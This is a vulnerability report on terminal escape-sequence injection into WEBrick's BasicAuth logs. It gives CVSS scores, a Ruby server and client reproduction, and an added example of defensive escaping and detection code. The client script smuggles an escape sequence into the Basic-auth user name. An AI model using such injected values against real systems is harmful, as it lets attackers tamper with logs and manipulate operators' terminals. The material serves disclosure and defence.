CVSS3: 8.8 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: REQUIRED
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 9.3 High
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

EPSS: 0.012 Low
Percentile: 83.2%

WEBrick BasicAuth writes any non-existent user name to its logs without sanitizing it. By exploiting this, an attacker can inject malicious escape sequences into the logs. This issue is exactly the same as the old already-fixed vulnerability.

How to reproduce:

# Server: WEBrick with Basic authentication on port 34567
require "webrick"
require "webrick/httpauth"

srv = WEBrick::HTTPServer.new({ Port: 34567 })
db = WEBrick::HTTPAuth::Htpasswd.new("dot.htpasswd")
authenticator = WEBrick::HTTPAuth::BasicAuth.new(UserDB: db, Realm: "realm")
srv.mount_proc("/") do |req, res|
  authenticator.authenticate(req, res)
  res.body = "foobar"
end
srv.start

# Client (run as a separate script): the user name carries an escape sequence
require "open-uri"

open("http://localhost:34567/login",
     http_basic_authentication: [
       "ESCAPE SEQUENCE HERE->\e]2;BOOM!\a<-SEE WINDOW TITLE",
       "passwd"
     ]).read

Server log:

[2017-04-24 19:23:46] ERROR Basic realm: ESCAPE SEQUENCE HERE-><-SEE WINDOW TITLE: the user is not allowed.

Note: I’m a member of the ruby-core team, but I’m not involved with development of WEBrick. I did not create the bug, of course. I will happily accept any bounty if any :-)
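
Added example (not part of the original report and not WEBrick's own code): one way to neutralize the injection described above is to escape control characters in the attacker-controlled user name before it reaches the log, and to flag existing log lines that already carry them. All helper names are hypothetical; the sample credentials are the ones from the reproduction.

```ruby
# Added example: every method name below is hypothetical, not WEBrick's API.

# Render backslashes and all control characters (C0, DEL, C1) as visible text.
def escape_for_log(value)
  text = value.to_s.dup.force_encoding(Encoding::UTF_8).scrub("?")
  text.gsub(/[\p{Cc}\\]/) { |ch| ch == "\\" ? "\\\\" : format("\\x%02X", ch.ord) }
end

# Decode an "Authorization: Basic ..." value into [user, password].
def basic_credentials(header_value)
  scheme, blob = header_value.split(" ", 2)
  return nil unless scheme&.casecmp?("Basic") && blob
  blob.unpack1("m").split(":", 2)
end

# Same message shape as the log line in the report; user name written raw.
def log_line_unsafe(realm, user)
  "ERROR Basic #{realm}: #{user}: the user is not allowed."
end

# Hardened form: the attacker-controlled field is escaped first.
def log_line_safe(realm, user)
  "ERROR Basic #{realm}: #{escape_for_log(user)}: the user is not allowed."
end

# Review aid for existing logs: true if the line carries any control
# character (tabs included) other than its line terminator.
def control_chars_in_log?(line)
  line.chomp.force_encoding(Encoding::UTF_8).scrub("?").match?(/\p{Cc}/)
end

# Constructed sample: the credentials used in the report's reproduction.
SAMPLE_USER = "ESCAPE SEQUENCE HERE->\e]2;BOOM!\a<-SEE WINDOW TITLE"
SAMPLE_HEADER = "Basic " + ["#{SAMPLE_USER}:passwd"].pack("m0")

if __FILE__ == $PROGRAM_NAME
  user, _password = basic_credentials(SAMPLE_HEADER)
  puts log_line_safe("realm", user)
  puts "raw line flagged:  #{control_chars_in_log?(log_line_unsafe('realm', user))}"
  puts "safe line flagged: #{control_chars_in_log?(log_line_safe('realm', user))}"
end
```

Escaping the backslash as well keeps the output unambiguous: a literal `\x1B` typed by a client cannot be mistaken for an escaped ESC byte.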